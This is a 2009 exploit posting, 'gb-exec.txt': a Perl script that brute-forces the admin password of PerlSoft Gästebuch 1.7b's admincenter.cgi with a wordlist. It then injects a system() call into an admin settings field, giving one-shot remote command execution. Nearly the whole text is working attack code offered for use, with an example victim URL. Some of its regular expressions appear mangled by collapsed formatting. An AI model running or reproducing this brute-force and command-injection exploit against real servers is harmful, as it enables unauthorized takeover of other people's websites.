gb-exec.txt
Posted on 30 January 2009
#!/usr/bin/perl =pod Typ: Bruter & RCE Name: PerlSoft GB Pwner Affected Software: PerlSoft Gästebuch Version: 1.7b Coder/Bugfounder: Perforin Visit: DarK-CodeZ.org Note: RCE ist only 1 time possible, do not waste your command! =cut use strict; use warnings; use diagnostics; use LWP::Simple; use LWP::Simple::Post qw(post post_xml); my ($url,$user,$wordlist,$error_counter,$word,$anfrage); my ($falsch,$richtig,$entry,$rce,$send,$crypted); my (@response,@rcesend,@array); if (@ARGV < 4) { &fail; } ($url,$user,$wordlist) = (@ARGV); $falsch = '<tr><td align=center><Font color="000000" FACE="Arial">Nur Administratoren mit gültigen Benutzerdaten haben Zugang in das Admin-Center!</font></td></tr>'; $richtig = '<tr><td bgcolor=#E0E0E0 align=center><B><Font color="000000" FACE="Arial">Gästebuch Vorlage - Einstellen</font></B></td></tr>'; if ($url !~ m/^http:///) { &fail; } if ($wordlist !~ m/.(txt|list|dat)$/) { &fail; } print <<"show"; --==[Perforins PerlSoft GB Pwner]==-- [+] Attack: $url [+] User: $user [+] Wordlist: $wordlist show open(WordList,"<","$wordlist") || die "No wordlist found!"; foreach $word (<WordList>) { chomp($word); $crypted = crypt($word,"codec"); $anfrage = $url.'?sub=vorlage&id='.$user.'&pw='.$crypted; @array = get($anfrage) || (print "[-] Cannot connect! ") && exit; foreach $entry (@array) { if ($entry =~ m/$richtig/i) { print " [+] Password cracked: "."$crypted:$word"." ! "; if ($ARGV[3] =~ m/yes/i ) { print <<"RCE"; [+] Remote Command Execution possible! [~] Note: Only _1_ time exploitable, do not waste it! [+] Please enter your Command! RCE chomp($rce = <STDIN>); $rce =~ s/>/".chr(62)."/ig; $rce =~ s/</".chr(60)."/ig; $rce =~ s/|/".chr(124)."/ig; $rce =~ s/&/".chr(38)."/ig; $rce =~ s///".chr(47)."/ig; $rce =~ s/-/".chr(45)."/ig; $send = 'loginname='.$user.'&loginpw='.$word.'&loginname1='.$user.'";system("'.$rce.'");print "h4x&loginpw1='.$word.'&loginpw2='.$word.'&id='.$user.'&pw='.$crypted.'&sub=saveadmindaten'; @response = post($url, $send); @rcesend = get($url) || (print "[-] Cannot connect! ") && exit; print <<"END"; [+] Command executed! ---====[www.vx.perforin.de.vu]====--- END exit; } else { (print "---====[www.vx.perforin.de.vu]====--- ") and exit; } } elsif ($entry =~ m/$falsch/i) { $error_counter++; print "[~] Tested ".$error_counter.": "."$crypted:$word"." "; } } } close(WordList); print "[-] Could not be cracked! "; exit; sub fail { print <<"CONFIG"; +-------------------+ | | | PerlSoft GB Pwner | | v0.1 | | | +-------------------+-----[Coded by Perforin]-----------------------------+ | | | brute.pl http://opfer.lu/cgi-bin/admincenter.cgi admin wordlist.txt yes | | brute.pl http://opfer.lu/cgi-bin/admincenter.cgi admin wordlist.txt no | | | | yes = Remote Command Execution | | no = No Remote Command Execution | | | +-------------------------[vx.perforin.de.vu]-----------------------------+ CONFIG exit; }
